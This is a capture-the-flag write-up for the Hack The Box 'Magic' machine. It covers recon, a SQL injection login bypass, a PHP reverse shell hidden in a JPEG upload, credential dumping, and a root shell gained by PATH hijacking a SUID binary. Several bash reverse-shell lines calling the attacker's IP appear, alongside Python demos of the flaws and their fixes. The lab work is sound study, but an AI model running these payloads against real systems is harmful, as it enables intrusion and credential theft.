
HTB Magic done 1

Magic

Notes

OS:

Linux

Technology:

Apache httpd 2.4.29, PHP (index.php / login.php / upload.php), MySQL 5.7.29

IP Address:

10.129.214.115

Open ports:

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

Users and pass:

From file: /var/www/Magic/db.php5 (web root; the shell prompt later on the page confirms the path, it is not under /var/www/html)
$dbName = 'Magic' ;
$dbHost = 'localhost' ;
$dbUsername = 'theseus';
$dbUserPassword = 'iamkingtheseus';
---
From dump database
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
---
SSH user: theseus
L: theseus
P: Th3s3usW4sK1ng

Nmap

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Magic]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.214.115_nmap 10.129.214.115 ; cat 10.129.214.115_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-26 14:00 CET
Nmap scan report for 10.129.214.115
Host is up (0.063s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Magic Portfolio
|_http-server-header: Apache/2.4.29 (Ubuntu)

ffuf: http://10.129.214.115

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Magic]
└─$ ffuf -u http://10.129.214.115/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.129.214.115_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.214.115/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Extensions       : .php .html .txt .bac .backup .md .git 
 :: Output file      : 10.129.214.115_ffuz.{json,ejson,html,md,csv,ecsv}
 :: File format      : all
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

assets                  [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 34ms]
[INFO] Adding a new job to the queue: http://10.129.214.115/assets/FUZZ

images                  [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 33ms]
[INFO] Adding a new job to the queue: http://10.129.214.115/images/FUZZ

index.php               [Status: 200, Size: 4053, Words: 491, Lines: 60, Duration: 42ms]
login.php               [Status: 200, Size: 4221, Words: 1179, Lines: 118, Duration: 46ms]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 46ms]
upload.php              [Status: 302, Size: 2957, Words: 814, Lines: 85, Duration: 39ms]
[INFO] Starting queued job on target: http://10.129.214.115/assets/FUZZ

css                     [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 37ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.214.115/assets/css/
js                      [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 44ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.214.115/assets/js/
[INFO] Starting queued job on target: http://10.129.214.115/images/FUZZ

uploads                 [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 35ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.214.115/images/uploads/
:: Progress: [163752/163752] :: Job [3/3] :: 1156 req/sec :: Duration: [0:03:17] :: Errors: 0 ::

Bypass auth as admin user (SQL injection in login.php)

Three POSTs to login.php: a baseline with admin/admin, the same with a single quote appended to the password to see whether the input reaches the SQL statement unescaped, and the classic payload admin' or 1=1 --  in the password field (URL-encoded in the third request; the trailing space after -- matters, MySQL only treats "-- " followed by whitespace as a comment). The third request logs in as admin without knowing the password.

POST /login.php HTTP/1.1
Host: 10.129.214.115
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://10.129.214.115
Connection: keep-alive
Referer: http://10.129.214.115/login.php
Cookie: PHPSESSID=3rgbe5ed2963c00kuk8r1eso87
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=admin&password=admin
___

POST /login.php HTTP/1.1
Host: 10.129.214.115
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://10.129.214.115
Connection: keep-alive
Referer: http://10.129.214.115/login.php
Cookie: PHPSESSID=3rgbe5ed2963c00kuk8r1eso87
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=admin&password=admin'

---
POST /login.php HTTP/1.1
Host: 10.129.214.115
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://10.129.214.115
Connection: keep-alive
Referer: http://10.129.214.115/login.php
Cookie: PHPSESSID=3rgbe5ed2963c00kuk8r1eso87
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=admin&password=admin%27+or+1%3D1+-- 
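
The injection above, reproduced as an added example (not code from the box or from this writeup). login.php itself was never read, so the vulnerable function below is an assumed shape, a query built by string splicing, and the table is an in-memory SQLite copy of the `login` schema taken from the mysqldump further down this page. It shows what each of the three passwords does to the statement and why the parameterised version is unaffected.

```python
import sqlite3

# Constructed stand-in for the box's `login` table: same columns as the
# mysqldump on this page, password stored in clear (as the dump shows).
SCHEMA = """
CREATE TABLE login (
    id       INTEGER PRIMARY KEY AUTOINCREMENT,
    username VARCHAR(50)  NOT NULL UNIQUE,
    password VARCHAR(100) NOT NULL
);
INSERT INTO login VALUES (1, 'admin', 'Th3s3usW4sK1ng');
"""


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_login(username, password):
    """Assumed shape of the flawed check: user input spliced into the SQL text.
    The statement the real login.php runs was not recovered; this is the
    pattern that the  ' or 1=1 --  payload relies on."""
    conn = _connect()
    query = ("SELECT username FROM login "
             "WHERE username='%s' AND password='%s'" % (username, password))
    return conn.execute(query).fetchone() is not None


def safe_login(username, password):
    """Hardened form: bound parameters, so the quote and the comment stay data."""
    conn = _connect()
    row = conn.execute(
        "SELECT username FROM login WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None


def probe(login_fn, username, password):
    """Classify one attempt the way the three requests above do:
    'granted' / 'denied' for a well-formed statement, 'sql_error' when the
    input broke the statement (the lone-quote case)."""
    try:
        return "granted" if login_fn(username, password) else "denied"
    except sqlite3.OperationalError:
        return "sql_error"


if __name__ == "__main__":
    # The three password values from the requests above, URL-decoded.
    # Trailing space after "--": required by MySQL, optional for SQLite.
    for pw in ("admin", "admin'", "admin' or 1=1 -- "):
        print("%-22r vulnerable=%-9s safe=%s" % (
            pw, probe(vulnerable_login, "admin", pw), probe(safe_login, "admin", pw)))
```

The second probe is the useful one during recon: a lone quote turning a clean "denied" into a server error is the signal that the third payload is worth sending.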

Create revshell (upload a JPEG/PHP polyglot)

upload.php only accepts images, so the file is named r2.php.jpeg, sent with Content-Type: image/jpeg, and starts with the JPEG magic bytes (FF D8 FF E0 ... JFIF) followed by the PHP reverse shell. The header satisfies the image check, while the .php segment in the name still gets the file handed to PHP when it is requested from /images/uploads/ (this is what happens when PHP is wired up with AddHandler/AddType, because mod_mime treats every dot-separated segment as an extension).

POST /upload.php HTTP/1.1
Host: 10.129.214.115
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------256873977516807931332031173037
Content-Length: 457
Origin: http://10.129.214.115
Connection: keep-alive
Referer: http://10.129.214.115/upload.php
Cookie: PHPSESSID=3rgbe5ed2963c00kuk8r1eso87
Upgrade-Insecure-Requests: 1
Priority: u=0, i

-----------------------------256873977516807931332031173037
Content-Disposition: form-data; name="image"; filename="r2.php.jpeg"
Content-Type: image/jpeg

ÿØÿàJFIFÿۄ      
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.50/80 0>&1'"); ?>

-----------------------------256873977516807931332031173037
Content-Disposition: form-data; name="submit"

Upload Image
-----------------------------256873977516807931332031173037--
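
Added example, not code from the box or this writeup: it builds the same kind of polyglot as the upload above (JPEG header, then PHP) and runs it through two upload checks. The naive one is an assumed reconstruction of what upload.php must be doing (extension suffix plus magic bytes); the strict one is the hardened replacement. The PHP payload is a harmless placeholder where the writeup's file carried the bash reverse shell.

```python
# Constructed JPEG header: SOI marker + a minimal APP0/JFIF segment. These are
# the same leading bytes (FF D8 FF E0 .. "JFIF") seen in the request above.
JPEG_HEADER = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
               b"\x01\x01\x00\x00\x01\x00\x01\x00\x00")
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

ALLOWED_EXT = {"jpg", "jpeg", "png"}
# Segments a PHP handler is commonly bound to. Any of them anywhere in the
# name is a problem on servers that map handlers with AddHandler/AddType.
PHP_LIKE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}


def build_polyglot(php_source: bytes) -> bytes:
    """Image header first so magic-byte sniffing says 'JPEG', PHP after it.
    PHP ignores everything outside <?php ... ?>, so the header is harmless."""
    return JPEG_HEADER + b"\n" + php_source + b"\n"


def looks_like_image(data: bytes) -> bool:
    return data.startswith(b"\xff\xd8\xff") or data.startswith(PNG_MAGIC)


def name_has_php_segment(filename: str) -> bool:
    """Why r2.php.jpeg works: a non-final segment that a handler matches."""
    return any(seg in PHP_LIKE for seg in filename.lower().split(".")[:-1])


def naive_upload_check(filename: str, data: bytes) -> bool:
    """Assumed shape of the weak check: the name ends in an image extension and
    the content starts with image magic. r2.php.jpeg passes both."""
    name_ok = any(filename.lower().endswith("." + e) for e in ALLOWED_EXT)
    return name_ok and looks_like_image(data)


def strict_upload_check(filename: str, data: bytes) -> bool:
    """Hardened check: exactly one extension from the allow-list (so no
    name.php.jpeg at all), content must look like an image, and no PHP open
    tag anywhere in the body. The body scan is crude (a real JPEG can contain
    "<?" by chance); re-encoding the image is the robust fix. Deploy-side,
    also store under a server-chosen random name and serve the upload
    directory with the PHP handler disabled."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or parts[1] not in ALLOWED_EXT:
        return False
    if not looks_like_image(data):
        return False
    if b"<?" in data:
        return False
    return True


if __name__ == "__main__":
    poly = build_polyglot(b"<?php echo 'polyglot'; ?>")   # placeholder payload
    for name, body in (("r2.php.jpeg", poly), ("photo.jpeg", JPEG_HEADER)):
        print("%-12s php_segment=%-5s naive=%-5s strict=%s" % (
            name, name_has_php_segment(name),
            naive_upload_check(name, body), strict_upload_check(name, body)))
```

The extension check and the magic-byte check are both satisfiable independently of what PHP will later execute, which is the whole reason the polyglot works; the fix has to address the name, the content and the handler mapping together.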

---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Magic]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.50] from (UNKNOWN) [10.129.214.115] 34048
bash: cannot set terminal process group (1138): Inappropriate ioctl for device
bash: no job control in this shell
www-data@magic:/var/www/Magic/images/uploads$   

www-data@magic:/var/www/Magic/images/uploads$ whereis python     
whereis python
python: /usr/bin/python3.6m /usr/bin/python3.6 /usr/lib/python2.7 /usr/lib/python3.6 /usr/lib/python3.7 /usr/lib/python3.8 /etc/python2.7 /etc/python3.6 /usr/local/lib/python3.6 /usr/include/python3.6m /usr/share/python
www-data@magic:/var/www/Magic/images/uploads$ 

www-data@magic:/var/www/Magic/images/uploads$ /usr/bin/python3.6 -c 'import pty; pty.spawn("/bin/bash")'
<n/python3.6 -c 'import pty; pty.spawn("/bin/bash")'
www-data@magic:/var/www/Magic/images/uploads$ 

Read file: /var/www/Magic/db.php5

Find creds to DB (the file is in the web root /var/www/Magic, not /var/www/html; see the prompt below):
$dbName = 'Magic' ;
$dbHost = 'localhost' ;
$dbUsername = 'theseus';
$dbUserPassword = 'iamkingtheseus';

Note the .php5 extension: the ffuf run above did not include .php5 in -e, so this file was never found from outside. Worth checking separately whether Apache executes .php5 or serves it raw, because a raw fetch would hand out these credentials unauthenticated.
---
www-data@magic:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont  = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}

Dump database

Find creds:
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
---
www-data@magic:/home$ mysqldump --user=theseus --password=iamkingtheseus --host=localhost Magic
<us --password=iamkingtheseus --host=localhost Magic
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost    Database: Magic
-- ------------------------------------------------------
-- Server version   5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
  `id` int(6) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2025-03-26  8:07:10

Login as user: theseus

L: theseus
P: Th3s3usW4sK1ng
---
www-data@magic:/var/www/Magic/images/uploads$ su theseus
su theseus
su: must be run from a terminal
www-data@magic:/var/www/Magic/images/uploads$ /usr/bin/python3.6 -c 'import pty; pty.spawn("/bin/bash")'
<n/python3.6 -c 'import pty; pty.spawn("/bin/bash")'
www-data@magic:/var/www/Magic/images/uploads$ su theseus
su theseus
Password: Th3s3usW4sK1ng

theseus@magic:/var/www/Magic/images/uploads$ cd ~

Find SUID binary

Found interesting binary: /bin/sysinfo (non-standard, SUID, not part of the base system)
---
theseus@magic:~$ find / -perm -u=s -type f 2>/dev/null | grep -vE "snap|lib"
find / -perm -u=s -type f 2>/dev/null | grep -vE "snap|lib"
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/vmware-user-suid-wrapper
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
/bin/su
/bin/ping

Check binary: /bin/sysinfo

strings shows it shells out to lshw -short, fdisk -l and cat /proc/cpuinfo by bare command name through popen() (hence the "popen() failed!" string). popen() hands the line to /bin/sh -c, which looks up fdisk along the caller's PATH, and nothing in the binary pins PATH, so a SUID binary like this runs whichever fdisk comes first on a PATH the user controls.

...
theseus@magic:~$ strings /bin/sysinfo | grep Disk
strings /bin/sysinfo | grep Disk
====================Disk Info====================
theseus@magic:~$ strings /bin/sysinfo | grep -C3 "Disk"
strings /bin/sysinfo | grep -C3 "Disk"
popen() failed!
====================Hardware Info====================
lshw -short
====================Disk Info====================
fdisk -l
====================CPU Info====================
cat /proc/cpuinfo
...

Create revshell (fake fdisk in /tmp)

The file name must match the bare command name sysinfo calls, so it is fdisk, and it must be executable.

theseus@magic:~$ cd /tmp/
cd /tmp/
theseus@magic:/tmp$ echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.14.53/80 0>&1' > fdisk
<n\nbash -i >& /dev/tcp/10.10.14.53/80 0>&1' > fdisk
theseus@magic:/tmp$ chmod a+x fdisk
chmod a+x fdisk
theseus@magic:/tmp$ 

theseus@magic:/tmp$ ls -la fdisk
ls -la fdisk
-rwxrwxr-x 1 theseus theseus 53 Mar 27 04:50 fdisk
theseus@magic:/tmp$ 

Edit $PATH

Prepend /tmp so the fake fdisk is found before the real one. The two `export $PATH` lines below are a mistake: $PATH is expanded before export runs, so bash complains that the value is not a valid identifier. The error text does happen to print the current value, which confirms /tmp/ is first after the change; `echo $PATH` is the proper way to check.

theseus@magic:/tmp$ export $PATH
export $PATH
bash: export: `/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games': not a valid identifier
theseus@magic:/tmp$ export PATH="/tmp/:$PATH"
export PATH="/tmp/:$PATH"
theseus@magic:/tmp$ 

theseus@magic:/tmp$ export $PATH
export $PATH
bash: export: `/tmp/:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games': not a valid identifier
theseus@magic:/tmp$ 

Run revshell

Start the listener first, then run /bin/sysinfo. When it reaches fdisk -l it executes /tmp/fdisk with the binary's root privileges and the listener gets a root shell. The id output at the end (uid=0 gid=0 with theseus's supplementary groups still attached) shows the binary switched its real uid and gid to root rather than only holding an effective uid of 0.

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Magic]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.53] from (UNKNOWN) [10.129.214.115] 55572
root@magic:/tmp# 
---
theseus@magic:/tmp$ /bin/sysinfo
/bin/sysinfo
====================Hardware Info====================
H/W path           Device     Class      Description
====================================================
...
...
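
The whole PATH-hijack chain above (plant a fake fdisk, prepend its directory to PATH, let a privileged program call fdisk by bare name) as an added example, not code from the box or this writeup. /bin/sysinfo itself is not reproduced; run_like_sysinfo mimics its popen("fdisk -l") with a subprocess call, the fake tool prints a marker instead of opening a reverse shell, and the directory is a temporary one rather than /tmp. resolve_trusted is the hardened lookup the binary should have used. TRUSTED_PATH is the box's default PATH as printed in the export error above, with no user-writable directory in it.

```python
import os
import shutil
import subprocess
import tempfile

# The PATH value the box printed, minus anything user-writable. A SUID binary
# should use something like this instead of whatever it inherited.
TRUSTED_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def plant_fake_tool(directory: str, name: str = "fdisk") -> str:
    """Drop an executable named like the tool the SUID binary calls. The
    writeup's version was a bash reverse shell; a marker is enough here."""
    path = os.path.join(directory, name)
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\necho HIJACKED\n")
    os.chmod(path, 0o755)
    return path


def run_like_sysinfo(command: str, path_env: str) -> str:
    """Mimic popen("fdisk -l"): the string goes to /bin/sh -c, and the first
    word is looked up along whatever PATH the process was handed."""
    res = subprocess.run(command, shell=True, capture_output=True, text=True,
                         env={"PATH": path_env})
    return res.stdout.strip()


def resolve_trusted(tool: str, trusted: str = TRUSTED_PATH):
    """Hardened lookup: ignore the environment and resolve against a fixed,
    root-owned set of directories; None means refuse rather than fall back."""
    return shutil.which(tool, path=trusted)


def demo() -> dict:
    """Run the attack against the mimic and the hardened lookup side by side."""
    with tempfile.TemporaryDirectory() as tmp:      # stands in for /tmp
        plant_fake_tool(tmp)
        hijacked = tmp + ":" + TRUSTED_PATH          # what export PATH=/tmp/:$PATH does
        return {
            "tmp": tmp,
            "hijacked_output": run_like_sysinfo("fdisk -l", hijacked),
            "hijacked_resolves_to": shutil.which("fdisk", path=hijacked),
            "trusted_resolves_to": resolve_trusted("fdisk"),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

Pinning PATH (or calling /sbin/fdisk by absolute path) is the fix on the binary side; on the audit side, any SUID program whose strings output shows bare command names next to a popen/system error message deserves exactly this test.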

Read flag: root.txt

root@magic:/tmp# cd /root
cd /root
root@magic:/root# ls -a
ls -a
.
..
.bash_history
.bash_profile
.bashrc
.cache
.gnupg
info.c
.local
root.txt
snap
root@magic:/root# 

root@magic:/root# cat root.txt ; id
cat root.txt ; id
9523cab56f86c859d32ebc804b9a00da
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
root@magic:/root# 

References

Lessons Learned

Tags